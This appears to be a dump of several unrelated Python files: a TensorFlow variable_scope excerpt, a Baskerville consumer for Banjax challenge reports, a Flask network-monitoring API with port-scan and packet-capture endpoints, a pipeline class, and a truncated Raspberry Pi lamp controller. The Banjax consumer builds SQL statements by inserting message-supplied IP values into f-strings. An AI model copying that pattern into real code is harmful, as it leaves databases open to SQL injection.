this name will be uniquified. If name_or_scope is provided it won't be used and therefore it is not required and can be None. values: The list of `Tensor` arguments that are passed to the op function. initializer: default initializer for variables within this scope. regularizer: default regularizer for variables within this scope. caching_device: default caching device for variables within this scope. partitioner: default partitioner for variables within this scope. custom_getter: default custom getter for variables within this scope. reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create variables if they do not exist, and return them otherwise; if None, we inherit the parent scope's reuse flag. When eager execution is enabled, new variables are always created unless an EagerVariableStore or template is currently active. dtype: type of variables created in this scope (defaults to the type in the passed scope, or inherited from parent scope). use_resource: If False, all variables will be regular Variables. If True, experimental ResourceVariables with well-defined semantics will be used instead. Defaults to False (will later change to True). When eager execution is enabled this argument is always forced to be True. constraint: An optional projection function to be applied to the variable after being updated by an `Optimizer` (e.g. used to implement norm constraints or value constraints for layer weights). The function must take as input the unprojected Tensor representing the value of the variable and return the Tensor for the projected value (which must have the same shape). Constraints are not safe to use when doing asynchronous distributed training. auxiliary_name_scope: If `True`, we create an auxiliary name scope with the scope. If `False`, we don't create it. Note that the argument is not inherited, and it only takes effect for once when creating. You should only use it for re-entering a premade variable scope. Returns: A scope that can be captured and reused. Raises: ValueError: when trying to reuse within a create scope, or create within a reuse scope. TypeError: when the types of some arguments are not appropriate. """ self._name_or_scope = name_or_scope self._default_name = default_name self._values = values self._initializer = initializer self._regularizer = regularizer self._caching_device = caching_device self._partitioner = partitioner self._custom_getter = custom_getter self._reuse = reuse self._dtype = dtype self._use_resource = use_resource self._constraint = constraint if self._default_name is None and self._name_or_scope is None: raise TypeError("If default_name is None then name_or_scope is required") if self._reuse is False: # We don't allow non-inheriting scopes, False = None here. self._reuse = None if not (self._reuse is True or self._reuse is None or self._reuse is AUTO_REUSE): raise ValueError("The reuse parameter must be True or False or None.") if self._values is None: self._values = [] self._in_graph_mode = not context.executing_eagerly() if self._in_graph_mode: self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access self._cached_pure_variable_scope = None self._current_name_scope = None if not isinstance(auxiliary_name_scope, bool): raise TypeError("The auxiliary_name_scope must be `True` or `False`, " "while get {}".format(auxiliary_name_scope)) self._auxiliary_name_scope = auxiliary_name_scope def __enter__(self): # If the default graph is building a function, then we should not replace it # with the cached graph. if ops.get_default_graph().building_function: self._building_function = True else: self._building_function = False if self._in_graph_mode and not self._building_function: self._graph_context_manager = self._graph.as_default() self._graph_context_manager.__enter__() if self._cached_pure_variable_scope is not None: # Fast path for re-entering variable_scopes. We've held on to the pure # variable scope from a previous successful __enter__, so we avoid some # overhead by re-using that object. if self._current_name_scope is not None: self._current_name_scope.__enter__() return self._cached_pure_variable_scope.__enter__() try: return self._enter_scope_uncached() except: if self._graph_context_manager is not None: self._graph_context_manager.__exit__(*sys.exc_info()) raise def _enter_scope_uncached(self): """Enters the context manager when there is no cached scope yet. Returns: The entered variable scope. Raises: TypeError: A wrong type is passed as `scope` at __init__(). ValueError: `reuse` is incorrectly set at __init__(). """ if self._auxiliary_name_scope: # Create a new name scope later current_name_scope = None else: # Reenter the current name scope name_scope = ops.get_name_scope() if name_scope: # Hack to reenter name_scope += "/" current_name_scope = ops.name_scope(name_scope) else: # Root scope current_name_scope = ops.name_scope(name_scope) # IMPORTANT: Only assign to self._cached_pure_variable_scope and # self._current_name_scope after successful __enter__() calls. if self._name_or_scope is not None: if not isinstance(self._name_or_scope, (VariableScope,) + six.string_types): raise TypeError("VariableScope: name_or_scope must be a string or " "VariableScope.") if isinstance(self._name_or_scope, six.string_types): name_scope = self._name_or_scope else: name_scope = self._name_or_scope.name.split("/")[-1] if name_scope or current_name_scope: current_name_scope = current_name_scope or ops.name_scope(name_scope) try: current_name_scope_name = current_name_scope.__enter__() except: current_name_scope.__exit__(*sys.exc_info()) raise self._current_name_scope = current_name_scope if isinstance(self._name_or_scope, six.string_types): old_name_scope = current_name_scope_name else: old_name_scope = self._name_or_scope.original_name_scope pure_variable_scope = _pure_variable_scope( self._name_or_scope, reuse=self._reuse, initializer=self._initializer, regularizer=self._regularizer, caching_device=self._caching_device, partitioner=self._partitioner, custom_getter=self._custom_getter, old_name_scope=old_name_scope, dtype=self._dtype, use_resource=self._use_resource, constraint=self._constraint) try: entered_pure_variable_scope = pure_variable_scope.__enter__() except: pure_variable_scope.__exit__(*sys.exc_info()) raise self._cached_pure_variable_scope = pure_variable_scope return entered_pure_variable_scope else: self._current_name_scope = None # This can only happen if someone is entering the root variable scope. pure_variable_scope = _pure_variable_scope( self._name_or_scope, reuse=self._reuse, initializer=self._initializer, regularizer=self._regularizer, caching_device=self._caching_device, partitioner=self._partitioner, custom_getter=self._custom_getter, dtype=self._dtype, use_resource=self._use_resource, constraint=self._constraint) try: entered_pure_variable_scope = pure_variable_scope.__enter__() except: pure_variable_scope.__exit__(*sys.exc_info()) raise self._cached_pure_variable_scope = pure_variable_scope return entered_pure_variable_scope else: # Here name_or_scope is None. Using default name, but made unique. if self._reuse: raise ValueError("reuse=True cannot be used without a name_or_scope") current_name_scope = current_name_scope or ops.name_scope( self._default_name) try: current_name_scope_name = current_name_scope.__enter__() except: current_name_scope.__exit__(*sys.exc_info()) raise self._current_name_scope = current_name_scope unique_default_name = _get_unique_variable_scope(self._default_name) pure_variable_scope = _pure_variable_scope( unique_default_name, initializer=self._initializer, regularizer=self._regularizer, caching_device=self._caching_device, partitioner=self._partitioner, custom_getter=self._custom_getter, old_name_scope=current_name_scope_name, dtype=self._dtype, use_resource=self._use_resource, constraint=self._constraint) try: entered_pure_variable_scope = pure_variable_scope.__enter__() except: pure_variable_scope.__exit__(*sys.exc_info()) raise self._cached_pure_variable_scope = pure_variable_scope return entered_pure_variable_scope def __exit__(self, type_arg, value_arg, traceback_arg): self._cached_pure_variable_scope.__exit__( type_arg, value_arg, traceback_arg) if self._current_name_scope: self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg) if self._in_graph_mode and not self._building_function: self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg) # pylint: disable=g-doc-return-or-yield @tf_export(v1=["variable_op_scope"]) @tf_contextlib.contextmanager def variable_op_scope(values, name_or_scope, default_name=None, initializer=None, regularizer=None, caching_device=None, partitioner=None, custom_getter=None, reuse=None, dtype=None, use_resource=None, constraint=None): """Deprecated: context manager for defining an op that creates variables.""" logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated," " use tf.variable_scope(name, default_name, values)") with variable_scope(name_or_scope, default_name=default_name, values=values, initializer=initializer, regularizer=regularizer, caching_device=caching_device, partitioner=partitioner, custom_getter=custom_getter, reuse=reuse, dtype=dtype, use_resource=use_resource, constraint=constraint) as scope: yield scope def _compute_slice_dim_and_shape(full_shape, slicing): """Computes which dimension is being sliced and the typical slice shape.""" slice_shape = [0] * len(full_shape) slice_dim = None for dim, num_slices in enumerate(slicing): dim_size = full_shape[dim] if num_slices <= 0 or dim_size < num_slices: raise ValueError("Cannot create %d slices for size %d. shape: %s, " "slicing: %s" % (num_slices, full_shape[dim], full_shape, slicing)) if num_slices == 1: # Not slicing in this dimension. slice_shape[dim] = dim_size elif slice_dim is not None: # We only support slicing along one of the dimensions. raise ValueError("Can only slice a variable along one dimension: " "shape: %s, slicing: %s" % (full_shape, slicing)) else: # Note: We will add any extras onto the last slice, later. slice_dim = dim slice_shape[dim] = dim_size // num_slices # Degenerate case: If "slicing" was all ones, pretend we are slicing along # the first dimension. if slice_dim is None: slice_dim = 0 return slice_dim, slice_shape def _get_trainable_value(synchronization, trainable): """Computes the trainable value based on the given arguments.""" if synchronization == VariableSynchronization.ON_READ: if trainable: raise ValueError( "Synchronization value can be set to " "VariableSynchronization.ON_READ only for non-trainable variables. " "You have specified trainable=True and " "synchronization=VariableSynchronization.ON_READ.") else: # Set trainable to be false when variable is to be synced on read. trainable = False elif trainable is None: trainable = True return trainable def default_variable_creator(next_creator=None, **kwargs): """Default variable creator.""" assert next_creator is None initial_value = kwargs.get("initial_value", None) trainable = kwargs.get("trainable", None) collections = kwargs.get("collections", None) validate_shape = kwargs.get("validate_shape", True) caching_device = kwargs.get("caching_device", None) name = kwargs.get("name", None) variable_def = kwargs.get("variable_def", None) dtype = kwargs.get("dtype", None) expected_shape = kwargs.get("expected_shape", None) import_scope = kwargs.get("import_scope", None) constraint = kwargs.get("constraint", None) use_resource = kwargs.get("use_resource", None) # Set trainable value based on synchronization value. synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO) trainable = _get_trainable_value( synchronization=synchronization, trainable=trainable) if use_resource is None: use_resource = get_variable_scope().use_resource if use_resource is None: use_resource = _DEFAULT_USE_RESOURCE use_resource = use_resource or context.executing_eagerly() if use_resource: return resource_variable_ops.ResourceVariable( initial_value=initial_value, trainable=trainable, collections=collections, validate_shape=validate_shape, caching_device=caching_device, name=name, dtype=dtype, constraint=constraint, variable_def=variable_def, import_scope=import_scope) else: return variables.RefVariable( initial_value=initial_value, trainable=trainable, collections=collections, validate_shape=validate_shape, caching_device=caching_device, name=name, dtype=dtype, constraint=constraint, variable_def=variable_def, expected_shape=expected_shape, import_scope=import_scope) def default_variable_creator_v2(next_creator=None, **kwargs): """Default variable creator.""" assert next_creator is None initial_value = kwargs.get("initial_value", None) trainable = kwargs.get("trainable", None) validate_shape = kwargs.get("validate_shape", True) caching_device = kwargs.get("caching_device", None) name = kwargs.get("name", None) variable_def = kwargs.get("variable_def", None) dtype = kwargs.get("dtype", None) import_scope = kwargs.get("import_scope", None) constraint = kwargs.get("constraint", None) # Set trainable value based on synchronization value. synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO) trainable = _get_trainable_value( synchronization=synchronization, trainable=trainable) return resource_variable_ops.ResourceVariable( initial_value=initial_value, trainable=trainable, validate_shape=validate_shape, caching_device=caching_device, name=name, dtype=dtype, constraint=constraint, variable_def=variable_def, import_scope=import_scope) variables.default_variable_creator = default_variable_creator variables.default_variable_creator_v2 = default_variable_creator_v2 def _make_getter(captured_getter, captured_previous): """Gets around capturing loop variables in python being broken.""" return lambda **kwargs: captured_getter(captured_previous, **kwargs) # TODO(apassos) remove forwarding symbol variable = variables.VariableV1 @tf_export(v1=["variable_creator_scope"]) @tf_contextlib.contextmanager def variable_creator_scope_v1(variable_creator): """Scope which defines a variable creation function to be used by variable(). variable_creator is expected to be a function with the following signature: ``` def variable_creator(next_creator, **kwargs) ``` The creator is supposed to eventually call the next_creator to create a variable if it does want to create a variable and not call Variable or ResourceVariable directly. This helps make creators composable. A creator may choose to create multiple variables, return already existing variables, or simply register that a variable was created and defer to the next creators in line. Creators can also modify the keyword arguments seen by the next creators. Custom getters in the variable scope will eventually resolve down to these custom creators when they do create variables. The valid keyword arguments in kwds are: initial_value: A `Tensor`, or Python object convertible to a `Tensor`, which is the initial value for the Variable. The initial value must have a shape specified unless `validate_shape` is set to False. Can also be a callable with no argument that returns the initial value when called. In that case, `dtype` must be specified. (Note that initializer functions from init_ops.py must first be bound to a shape before being used here.) trainable: If `True`, the default, also adds the variable to the graph collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as the default list of variables to use by the `Optimizer` classes. `trainable` defaults to `True` unless `synchronization` is set to `ON_READ`. collections: List of graph collections keys. The new variable is added to these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`. validate_shape: If `False`, allows the variable to be initialized with a value of unknown shape. If `True`, the default, the shape of `initial_value` must be known. caching_device: Optional device string describing where the Variable should be cached for reading. Defaults to the Variable's device. If not `None`, caches on another device. Typical use is to cache on the device where the Ops using the Variable reside, to deduplicate copying through `Switch` and other conditional statements. name: Optional name for the variable. Defaults to `'Variable'` and gets uniquified automatically. dtype: If set, initial_value will be converted to the given type. If `None`, either the datatype will be kept (if `initial_value` is a Tensor), or `convert_to_tensor` will decide. constraint: A constraint function to be applied to the variable after updates by some algorithms. use_resource: if True, a ResourceVariable is always created. synchronization: Indicates when a distributed a variable will be aggregated. Accepted values are constants defined in the class `tf.VariableSynchronization`. By default the synchronization is set to `AUTO` and the current `DistributionStrategy` chooses when to synchronize. If `synchronization` is set to `ON_READ`, `trainable` must not be set to `True`. aggregation: Indicates how a distributed variable will be aggregated. Accepted values are constants defined in the class `tf.VariableAggregation`. This set may grow over time, so it's important the signature of creators is as mentioned above. Args: variable_creator: the passed creator Yields: A scope in which the creator is active """ with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access yield # Note: only the docstrings differ between this and v1. @tf_export(v2=["variable_creator_scope"]) @tf_contextlib.contextmanager def variable_creator_scope(variable_creator): """Scope which defines a variable creation function to be used by variable(). variable_creator is expected to be a function with the following signature: ``` def variable_creator(next_creator, **kwargs) ``` The creator is supposed to eventually call the next_creator to create a variable if it does want to create a variable and not call Variable or ResourceVariable directly. This helps make creators composable. A creator may choose to create multiple variables, return already existing variables, or simply register that a variable was created and defer to the next creators in line. Creators can also modify the keyword arguments seen by the next creators. Custom getters in the variable scope will eventually resolve down to these custom creators when they do create variables. The valid keyword arguments in kwds are: initial_value: A `Tensor`, or Python object convertible to a `Tensor`, which is the initial value for the Variable. The initial value must have a shape specified unless `validate_shape` is set to False. Can also be a callable with no argument that returns the initial value when called. In that case, `dtype` must be specified. (Note that initializer functions from init_ops.py must first be bound to a shape before being used here.) trainable: If `True`, the default, GradientTapes automatically watch uses of this Variable. validate_shape: If `False`, allows the variable to be initialized with a value of unknown shape. If `True`, the default, the shape of `initial_value` must be known. caching_device: Optional device string describing where the Variable should be cached for reading. Defaults to the Variable's device. If not `None`, caches on another device. Typical use is to cache on the device where the Ops using the Variable reside, to deduplicate copying through `Switch` and other conditional statements. name: Optional name for the variable. Defaults to `'Variable'` and gets uniquified automatically. dtype: If set, initial_value will be converted to the given type. If `None`, either the datatype will be kept (if `initial_value` is a Tensor), or `convert_to_tensor` will decide. constraint: A constraint function to be applied to the variable after updates by some algorithms. synchronization: Indicates when a distributed a variable will be aggregated. Accepted values are constants defined in the class `tf.VariableSynchronization`. By default the synchronization is set to `AUTO` and the current `DistributionStrategy` chooses when to synchronize. If `synchronization` is set to `ON_READ`, `trainable` must not be set to `True`. aggregation: Indicates how a distributed variable will be aggregated. Accepted values are constants defined in the class `tf.VariableAggregation`. This set may grow over time, so it's important the signature of creators is as mentioned above. Args: variable_creator: the passed creator Yields: A scope in which the creator is active """ with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access yield
banjax_report_consumer.py
import datetime import threading import json from kafka import KafkaConsumer, KafkaProducer import time import logging import sys import types from baskerville.db import set_up_db from baskerville.models.config import KafkaConfig from baskerville.models.ip_cache import IPCache from baskerville.util.elastic_writer import ElasticWriter from baskerville.util.helpers import parse_config import argparse import os from baskerville import src_dir class BanjaxReportConsumer(object): status_message_fields = [ "timestamp", "restart_time", "reload_time", "num_of_challenges", "num_of_host_challenges", "num_of_ip_challenges", "swabber_ip_db_size", "regex_manager_ip_db_size", "challenger_ip_db_size", "proxy.process.traffic_server.memory.rss", "proxy.node.cache.contents.num_docs", "proxy.process.cache.bytes_total", "proxy.process.cache.percent_full", "proxy.process.cache.ram_cache.bytes_used", "proxy.process.cache.ram_cache.total_bytes", "proxy.process.net.connections_currently_open", "proxy.process.current_server_connections", "proxy.process.http.current_active_client_connections", "proxy.process.eventloop.time.max" ] def __init__(self, config, logger): self.config = config self.kafka_config = config.kafka self.logger = logger self.ip_cache = IPCache(config, self.logger) self.session, self.engine = set_up_db(config.database.__dict__) if config.elastic: self.elastic_writer = ElasticWriter(host=config.elastic.host, port=config.elastic.port, user=config.elastic.user, password=config.elastic.password) else: self.elastic_writer = None # XXX i think the metrics registry swizzling code is passing # an extra argument here mistakenly?.?. def _tmp_fun(_, _2, message): return message for field_name in self.__class__.status_message_fields: setattr(self, f"consume_{field_name}", types.MethodType(_tmp_fun, self)) def run(self): consumer = KafkaConsumer( self.kafka_config.banjax_report_topic, group_id=None, **self.config.kafka.connection ) for message in consumer: self.consume_message(message) consumer.close() def consume_message(self, message): if len(message.value) > 0: try: s = message.value.decode("utf-8") except UnicodeDecodeError: self.logger.info("got bad utf-8 over the kafka channel") try: d = json.loads(s) except json.JSONDecodeError: self.logger.info(f"got bad json over the kafka channel: {s}") # 'status'-type messages contain several metrics and are reported per $interval if d.get("name") == "status": edge_id = d.get("id") for k, _ in d.items(): if k == 'name' or k == 'id': continue try: f = getattr(self, f"consume_{k}") f(self, d) except AttributeError: self.logger.info(f"did not process banjax status {k} from edge {edge_id}") # 'ip_failed_challenge'-type messages are reported when a challenge is failed elif d.get("name") == "ip_failed_challenge": self.consume_ip_failed_challenge_message(d) elif d.get("name") == "ip_passed_challenge" or d.get("name") == "ip_passed_challenge2": self.consume_ip_passed_challenge_message(d) elif d.get("name") == "ip_banned": self.consume_ip_banned_message(d) def get_time_filter(self): return (datetime.datetime.utcnow() - datetime.timedelta( minutes=self.config.engine.banjax_sql_update_filter_minutes)).strftime("%Y-%m-%d %H:%M:%S.000Z") def consume_ip_failed_challenge_message(self, message): ip = message['value_ip'] num_fails = self.ip_cache.ip_failed_challenge(ip) if num_fails == 0: return message try: if num_fails >= self.config.engine.banjax_num_fails_to_ban: self.ip_cache.ip_banned(ip) sql = f'update request_sets set banned = 1 where ' \ f'stop > \'{self.get_time_filter()}\' and challenged = 1 and ip = \'{ip}\'' else: sql = f'update request_sets set challenge_failed = {num_fails} where ' \ f'stop > \'{self.get_time_filter()}\' and challenged = 1 and ip = \'{ip}\'' self.session.execute(sql) self.session.commit() except Exception: self.session.rollback() self.logger.error(Exception) raise return message def consume_ip_passed_challenge_message(self, message): ip = message['value_ip'] host = message['value_site'] processed = self.ip_cache.ip_passed_challenge(ip) if not processed: return message try: if self.elastic_writer: with self.elastic_writer as writer: writer.write_challenge_passed(ip, host) sql = f'update request_sets set challenge_passed = 1 where ' \ f'stop > \'{self.get_time_filter()}\' ' \ f'and challenged = 1 and ip = \'{ip}\'' self.session.execute(sql) self.session.commit() except Exception: self.session.rollback() self.logger.error(Exception) raise return message def consume_ip_banned_message(self, message): ip = message['value_ip'] self.logger.info(f'Banjax ip_banned {ip} ...') try: sql = f'update request_sets set banned = 1 where ' \ f'stop > \'{self.get_time_filter()}\' and challenged = 1 and ip = \'{ip}\'' self.session.execute(sql) self.session.commit() except Exception: self.session.rollback() self.logger.error(Exception) raise return message class ChallengeProducer(object): def __init__(self, config, logger): self.config = config self.logger = logger def run(self): producer = KafkaProducer(**self.config.kafka.connection) number = 0 while True: for _ in range(0, 10): domain = f"example-{number}.com:8080" command = {'name': 'challenge_host', 'value': domain} producer.send(self.config.banjax_command_topic, json.dumps(command).encode('utf-8')) self.logger.info("sent a command") number = number + 1 time.sleep(1) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument( "--conf", action="store", dest="conf_file", default=os.path.join(src_dir, '..', 'conf', 'baskerville.yaml'), help="Path to config file" ) parser.add_argument( "-c", "--consumer", dest="start_consumer", action="store_true", help="start consumer", ) parser.add_argument( "-p", "--producer", dest="start_producer", action="store_true", help="start consumer", ) args = parser.parse_args() logging.basicConfig(stream=sys.stdout, level=logging.INFO) logger = logging.getLogger() config_dict = KafkaConfig(parse_config(path=args.conf_file)['kafka']).validate() if args.start_consumer: status_consumer = BanjaxReportConsumer(config_dict, logger) consumer_thread = threading.Thread(target=status_consumer.run) consumer_thread.start() if args.start_producer: challenge_producer = ChallengeProducer(config_dict, logger) producer_thread = threading.Thread(target=challenge_producer.run) producer_thread.start() if args.start_consumer: consumer_thread.join() if args.start_producer: producer_thread.join()
quokka_server.py
from flask import Flask, request from flask_cors import CORS from flask_restx import Api, Resource from quokka_server_utils import get_hostname_from_target, get_ip_address_from_target from DbHourlyTask import DbHourlyTask from apidoc_models import ApiModels import threading import atexit from flask_limiter import Limiter from flask_limiter.util import get_remote_address quokka_app = Flask(__name__) CORS(quokka_app) api = Api(quokka_app, version="1.0", title="Quokka", description="Quokka for 52-weeks-of-python", default="quokka", default_label="") ApiModels.set_api_models(api) from db_apis import get_all_hosts, set_host, get_host, get_host_status, get_host_status_summary from db_apis import get_all_devices, set_device, get_device, get_device_status, get_device_status_summary from db_apis import get_all_services, set_service, get_service, get_service_status, get_service_status_summary from db_apis import get_capture, get_portscan, get_traceroute from db_apis import record_portscan_data, record_traceroute_data, record_capture_data from worker_apis import start_portscan, start_traceroute, start_capture limiter = Limiter(quokka_app, key_func=get_remote_address) # Start background DB hourly task db_hourly_task = DbHourlyTask() db_hourly_task_thread = threading.Thread(target=db_hourly_task.start) db_hourly_task_thread.start() # shutdown of our flask process requires terminating background db thread def shutdown(): db_hourly_task.set_terminate() db_hourly_task_thread.join() atexit.register(shutdown) # causes shutdown() to get called when exiting @api.route("/hosts") class HostsEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.response(200, 'Success', ApiModels.hosts_response) def get(): return get_all_hosts() @staticmethod @api.doc(params={"hostname": "Hostname of host to add or update"}, body=ApiModels.host_fields) @api.response(204, 'Success') @api.response(400, 'Must provide hostname to add/update host') def put(): hostname = request.args.get("hostname") if not hostname: return "Must provide hostname to add/update host", 400 host = request.get_json() set_host(host) return {}, 204 @api.route("/devices") class DevicesEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.response(200, 'Success', ApiModels.devices_response) def get(): return get_all_devices() @staticmethod @api.doc(params={"name": "Name of device to add or update"}, body=ApiModels.device_fields) @api.response(204, 'Success') @api.response(400, 'Must provide device name to add/update service') def put(): name = request.args.get("name") if not name: return "Must provide device name to add/update device", 400 device = request.get_json() set_device(device) return {}, 204 @api.route("/services") class ServicesEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.response(200, 'Success', [ApiModels.services_response]) def get(): return get_all_services() @staticmethod @api.doc(params={"name": "Name of service to add or update"}, body=ApiModels.service_fields) @api.response(204, 'Success') @api.response(400, 'Must provide service name to add/update service') def put(): name = request.args.get("name") if not name: return "Must provide service name to add/update service", 400 service = request.get_json() set_service(service) return {}, 204 @api.route("/scan") class ScanEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.doc(params={"token": "The token returned from the corresponding POST that initiated the portscan", "target": "The target for the portscan request"}) @api.response(200, 'Success', ApiModels.portscan_data) @api.response(400, "Must provide token and target to get portscan") def get(): target = request.args.get("target") if not target: return "Must provide target to get portscan", 400 token = request.args.get("token") if not token: return "Must provide token to get portscan", 400 return get_portscan(target, token) @staticmethod @api.doc(params={"target": "IP address or hostname of target host or device to scan"}) @api.response(200, 'Success', ApiModels.token_response) @api.response(400, 'Must provide target to get portscan') def post(): target = request.args.get("target") if not target: return "Must provide target to initiate portscan", 400 token = start_portscan(target) return {"token": token} @api.route("/worker/portscan") class WorkerScanEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.doc(body=ApiModels.portscan_data) @api.response(204, 'Success') def post(): portscan_data = request.get_json() record_portscan_data(portscan_data) return {}, 204 @api.route("/traceroute") class TracerouteEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.doc(params={"token": "The token returned from the corresponding POST that initiated the traceroute", "target": "The target for the traceroute request"}) @api.response(400, "Must provide token and target to get traceroute") @api.response(200, 'Success', ApiModels.traceroute_data) def get(): target = request.args.get("target") if not target: return "Must provide service target to get traceroute", 400 hostname = get_hostname_from_target(target) token = request.args.get("token") if not token: return "Must provide token to get traceroute", 400 return get_traceroute(hostname, token) @staticmethod @api.doc(params={"target": "IP address or hostname of target service, host, or device to find traceroute for"}) @api.response(200, 'Success', ApiModels.token_response) @api.response(400, 'Must provide target to initiate traceroute') def post(): target = request.args.get("target") if not target: return "Must provide target to get traceroute", 400 hostname = get_hostname_from_target(target) token = start_traceroute(hostname) return {"token": token} @api.route("/worker/traceroute") class WorkerTracerouteEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.doc(body=ApiModels.traceroute_data) @api.response(204, 'Success') def post(): traceroute_data = request.get_json() record_traceroute_data(traceroute_data) return {}, 204 @api.route("/capture") class CaptureEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.doc(params={"ip": "The ip address for which to capture packets", "protocol": "The protocol for which to capture packets", "port": "The port for which to capture packets", "num_packets": "The number of packets to retrieve"}) @api.response(200, 'Success', ApiModels.capture_data) def get(): ip = request.args.get("ip") protocol = request.args.get("protocol") port = request.args.get("port") num_packets = request.args.get("num_packets") if ip: ip = get_ip_address_from_target(ip) if not num_packets or not num_packets.isnumeric(): num_packets = 10 if port and port.isnumeric(): port = int(port) else: port = None return {"packets": get_capture(ip, protocol, port, int(num_packets))} @staticmethod @api.doc(params={"ip": "The ip address for which to capture packets", "protocol": "The protocol for which to capture packets", "port": "The port for which to capture packets", "capture_time": "The time to capture packets"}) @api.response(200, 'Capture initiated') def post(): ip = request.args.get("ip") protocol = request.args.get("protocol") port = request.args.get("port") capture_time = request.args.get("capture_time") if ip: ip = get_ip_address_from_target(ip) if not capture_time: capture_time = 180 else: capture_time = int(capture_time) start_capture(ip, protocol, port, capture_time) return "Capture initiated", 200 @api.route("/worker/capture") class WorkerCaptureEndpoint(Resource): @staticmethod @api.doc(body=ApiModels.capture_data) @api.response(204, 'Success') def post(): capture_data = request.get_json() record_capture_data(capture_data) return {}, 204 @api.route("/host/status") class HostStatusEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.doc(params={"hostname": "Hostname of host to get status for", "datapoints": "Number of datapoints to be returned"}) @api.response(200, 'Success') @api.response(400, 'Must provide hostname to get host status') def get(): hostname = request.args.get("hostname") datapoints = request.args.get("datapoints") if not hostname: return "Must provide hostname to get host status", 400 if not datapoints: datapoints = "24" if not datapoints.isnumeric(): return "Datapoints must be an integer", 400 host = get_host(hostname) if not host: return f"Unknown host: {hostname}", 400 host_status = {"host": host, "status": get_host_status(hostname, int(datapoints)), "summary": get_host_status_summary(hostname, int(datapoints))} return host_status, 200 @api.route("/service/status") class ServiceStatusEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.doc(params={"name": "Name of service to get status for", "datapoints": "Number of datapoints to be returned"}) @api.response(200, 'Success') @api.response(400, 'Must provide name to get service status') def get(): name = request.args.get("name") datapoints = request.args.get("datapoints") if not name: return "Must provide name to get service status", 400 if not datapoints: datapoints = "24" if not datapoints.isnumeric(): return "Datapoints must be an integer", 400 service = get_service(name) if not service: return f"Unknown service: {name}", 400 service_status = {"service": service, "status": get_service_status(name, int(datapoints)), "summary": get_service_status_summary(name, int(datapoints))} return service_status, 200 @api.route("/device/status") class DeviceStatusEndpoint(Resource): decorators = [limiter.limit("120/minute")] @staticmethod @api.doc(params={"name": "Name of device to get status for", "datapoints": "Number of datapoints to be returned"}) @api.response(200, 'Success') @api.response(400, 'Must provide name to get device status') def get(): name = request.args.get("name") datapoints = request.args.get("datapoints") if not name: return "Must provide name to get device status", 400 if not datapoints: datapoints = "24" if not datapoints.isnumeric(): return "Datapoints must be an integer", 400 device = get_device(name) if not device: return f"Unknown device: {name}", 400 device_status = {"device": device, "status": get_device_status(name, int(datapoints)), "summary": get_device_status_summary(name, int(datapoints))} return device_status, 200
program.py
import logging import queue import threading from uuid import UUID, uuid4 from opsi.webserver.schema import NodeTreeN from .manager import Manager from .pipeline import Node, Pipeline LOGGER = logging.getLogger(__name__) class Program: def __init__(self, lifespan): self.queue = queue.Queue() self.lifespan = lifespan self.pipeline = Pipeline(self) self.manager = Manager(self.pipeline) self.p_thread = None def create_node(self, func_type: str, uuid: UUID = None) -> Node: if uuid is None: uuid = uuid4() try: func = self.manager.funcs[func_type] except KeyError: raise ValueError(f"Function {func_type} not found") return self.pipeline.create_node(func, uuid) def mainloop(self, shutdown): self.shutdown = shutdown self.p_thread = threading.Thread(target=self.pipeline.mainloop) self.p_thread.name = "Pipeline Mainloop" self.p_thread.daemon = True self.p_thread.start() while not self.shutdown.is_set(): task = self.queue.get() # todo: blocking & timeout? task.run() # won't send exceptions because runs in seperate thead LOGGER.info("Program main loop is shutting down...") self.pipeline.clear() self.shutdown.clear()
raspberry_lamp.py
import subprocess import threading from time import sleep from threading import Thread import RPi.GPIO as GPIO import constants import firebase #from Subfact_ina219 import INA219 GPIO.setwarnings(False) GPIO.setmode(GPIO.BOARD) GPIO.setup(38, GPIO.OUT) GPIO.setup(40, GPIO.OUT) state=1 vcc=1 firebase = firebase.FirebaseApplication('https://ecolamp-c8fda.firebaseio.com/', None) _on=True _run=False _bat=False #ina = INA219() def get_firebase(): global state global vcc sleep(1) while _on: result = firebase.get('/Lamp', None) state=result['state'] vcc = result['vcc'] #38 PIN - SVET #40 PIN - VCC #print state #print vcc ''' def Auto_energy(): global _bat while _bat: print ("Bus : %.3f V" % ina.getBusVoltage_V()) print ("Current : %.3f mA" % ina.getCurrent_mA()) print ("WATT : %.3f mW" % ina.getPower_mW()) if ina.getBusVoltage_V()<=11.8:#220V GPIO.output(40,GPIO.LOW) elif ina.getBusVoltage_V()>12.5 : #12V GPIO.output(40,GPIO.HIGH) #REL'e FOR NOT COLLECTING ENERGY FROM SOLAR PANEL sleep(30) ''' def running(): global _run global GPIO global threadA global state global _bat global vcc sleep(0.5) while True: print(state) print(vcc) if state==0: print("AUTO MODE ON") _run=True else: _run=False print ("AUTO MODE OFF") if state==1: print ('Lights On') GPIO.output(38,GPIO.LOW)# na 40 HIGH #GPIO.output(40,GPIO.LOW) if state==2: print ('Lights Off') GPIO.output(38,GPIO.HIGH) # na 40 LOW if vcc==1: print ('always 220v') GPIO.output(40,GPIO.LOW) if vcc==0: print ('battery check mode') _bat=True ''' if not threadA.isAlive(): threadA = Thread(target = Auto_energy) threadA.start() GPIO.output(38,GPIO.LOW) GPIO.output(40,GPIO.HIGH) ''' sleep(2) #threadA = Thread(target = Auto_energy) threadB = 